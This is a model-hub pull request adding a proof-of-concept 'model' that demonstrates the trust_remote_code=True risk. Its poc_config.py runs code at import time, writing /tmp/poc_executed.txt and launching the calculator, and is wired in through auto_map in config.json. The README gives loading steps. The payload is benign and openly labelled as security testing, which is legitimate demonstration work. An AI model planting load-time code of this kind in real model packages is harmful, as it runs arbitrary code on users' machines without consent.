Upload POC model for security testing

by 1Teng - opened Aug 27

base: refs/heads/main

←

from: refs/pr/1

Discussion Files changed

+134

-3

Files changed (5) hide show

README.md +45 -3
config.json +25 -0
poc_config.py +49 -0
poc_model.py +7 -0
tokenizer_config.json +8 -0

README.md CHANGED Viewed

@@ -1,3 +1,45 @@
----
-license: mit
----

+---
+license: apache-2.0
+tags:
+- poc
+- security-testing
+---
+# Deserialization POC Model
+⚠️ **安全测试模型** ⚠️
+这是一个用于演示 trust_remote_code=True 漏洞的POC模型。
+## 测试方法
+### 方法1: LLaMA-Factory WebUI
+```bash
+# 1. 启动 WebUI
+python -m llamafactory.webui
+# 2. 在界面输入
+Model Name: test
+Model Path: 1Teng/Deserialization_Model
+# 3. 点击 Load Model
+# 4. 观察计算器是否打开
+```
+### 方法2: Python 代码
+```python
+from transformers import AutoConfig
+config = AutoConfig.from_pretrained(
+    "1Teng/Deserialization_Model",
+    trust_remote_code=True
+)
+```
+## 验证
+- 检查计算器是否打开
+- 查看 /tmp/poc_executed.txt
+## 说明
+- 仅用于安全测试
+- 只会打开计算器，无其他行为

config.json ADDED Viewed

	@@ -0,0 +1,25 @@

+{
+  "_name_or_path": "TinyLlama-0.6B-POC",
+  "architectures": [
+    "LlamaForCausalLM"
+  ],
+  "attention_bias": false,
+  "bos_token_id": 1,
+  "eos_token_id": 2,
+  "hidden_act": "silu",
+  "hidden_size": 1536,
+  "intermediate_size": 4096,
+  "max_position_embeddings": 2048,
+  "model_type": "llama",
+  "num_attention_heads": 12,
+  "num_hidden_layers": 12,
+  "num_key_value_heads": 4,
+  "rms_norm_eps": 1e-05,
+  "torch_dtype": "float16",
+  "transformers_version": "4.44.0",
+  "vocab_size": 32000,
+  "auto_map": {
+    "AutoConfig": "poc_config.POCConfig",
+    "AutoModelForCausalLM": "poc_model.POCModel"
+  }
+}

poc_config.py ADDED Viewed

	@@ -0,0 +1,49 @@

+# POC Configuration
+from transformers.models.llama import LlamaConfig
+import platform
+import subprocess
+import os
+import datetime
+def _poc_demo():
+    """POC: 打开计算器"""
+    system = platform.system()
+    # 创建标记文件
+    with open("/tmp/poc_executed.txt", "w") as f:
+        f.write(f"POC executed at: {datetime.datetime.now()}\n")
+        f.write(f"System: {system}\n")
+        f.write("Calculator will be opened as demonstration\n")
+    # 打开计算器
+    try:
+        if system == "Darwin":  # macOS
+            subprocess.Popen(["open", "-a", "Calculator"],
+                           stdout=subprocess.DEVNULL,
+                           stderr=subprocess.DEVNULL)
+        elif system == "Windows":
+            subprocess.Popen(["calc.exe"],
+                           stdout=subprocess.DEVNULL,
+                           stderr=subprocess.DEVNULL)
+        elif system == "Linux":
+            for calc in ["gnome-calculator", "kcalc", "xcalc"]:
+                try:
+                    subprocess.Popen([calc],
+                                   stdout=subprocess.DEVNULL,
+                                   stderr=subprocess.DEVNULL)
+                    break
+                except:
+                    continue
+    except:
+        pass
+    print("[POC] Code executed - check if calculator opened")
+    return True
+# 执行POC
+_poc_demo()
+class POCConfig(LlamaConfig):
+    model_type = "llama"
+    def __init__(self, **kwargs):
+        super().__init__(**kwargs)

poc_model.py ADDED Viewed

	@@ -0,0 +1,7 @@

+# POC Model
+from transformers.models.llama import LlamaForCausalLM
+class POCModel(LlamaForCausalLM):
+    def __init__(self, config):
+        super().__init__(config)
+        print("[POC] Model loaded")

tokenizer_config.json ADDED Viewed

	@@ -0,0 +1,8 @@

+{
+  "bos_token": "<s>",
+  "eos_token": "</s>",
+  "model_max_length": 2048,
+  "tokenizer_class": "LlamaTokenizer",
+  "unk_token": "<unk>",
+  "pad_token": "</s>"
+}